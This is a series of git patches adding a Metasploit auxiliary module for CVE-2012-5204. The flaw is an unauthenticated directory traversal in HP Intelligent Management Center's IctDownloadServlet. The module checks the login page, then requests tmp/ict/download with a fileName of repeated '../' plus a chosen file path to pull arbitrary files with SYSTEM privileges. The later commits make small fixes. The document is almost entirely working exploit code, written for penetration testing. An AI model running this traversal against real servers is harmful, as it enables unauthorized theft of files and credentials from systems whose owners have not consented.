From 0b4eab2499da42c3a1296d652050aa48b30382e2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 3 Apr 2013 00:24:11 +0200 Subject: [PATCH 1/3] added module for ZDI-13-053 --- .../hp_imc_ictdownloadservlet_traversal.rb | 100 ++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb new file mode 100644 index 0000000000..7249f7533b --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -0,0 +1,100 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal', + 'Description' => %q{ + This module exploits a lack of authentication and a directory traversal in HP + Intelligent Management, specifically in the IctDownloadServlet, in order to + retrieve arbitrary files with SYSTEM privileges. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5204' ], + [ 'OSVDB', '91029' ], + [ 'BID', '58676' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ] + ] + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']), + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\ + OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7]) + ], self.class) + end + + def is_imc? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return true + else + return false + end + end + + def run_host(ip) + + if not is_imc? + vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + travs << datastore['FILEPATH'] + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"), + 'method' => 'GET', + 'vars_get' => + { + 'fileName' => travs + } + }) + + if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc" + contents = res.body + fname = File.basename(datastore['FILEPATH']) + path = store_loot( + 'hp.imc.faultdownloadservlet', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end From 85d9e3e9eeddfd9cfe5d7c0b7e9cb0fe17892dea Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 3 Apr 2013 00:29:38 +0200 Subject: [PATCH 2/3] delete space --- .../scanner/http/hp_imc_ictdownloadservlet_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index 7249f7533b..4f03de5176 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the IctDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested - successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, 'License' => MSF_LICENSE, 'Author' => From b6edad1f1ddd97e1241815c5c4537aa703fea8d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 5 Apr 2013 11:04:43 +0200 Subject: [PATCH 3/3] fix DEPTH description and basename --- .../scanner/http/hp_imc_ictdownloadservlet_traversal.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index 4f03de5176..1e308b45d4 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']), OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\ - OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7]) + OptInt.new('DEPTH', [true, 'Traversal depth', 7]) ], self.class) end @@ -60,6 +60,10 @@ class Metasploit3 < Msf::Auxiliary end end + def my_basename(filename) + return ::File.basename(filename.gsub(/\\/, "/")) + end + def run_host(ip) if not is_imc? @@ -83,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc" contents = res.body - fname = File.basename(datastore['FILEPATH']) + fname = my_basename(datastore['FILEPATH']) path = store_loot( 'hp.imc.faultdownloadservlet', 'application/octet-stream',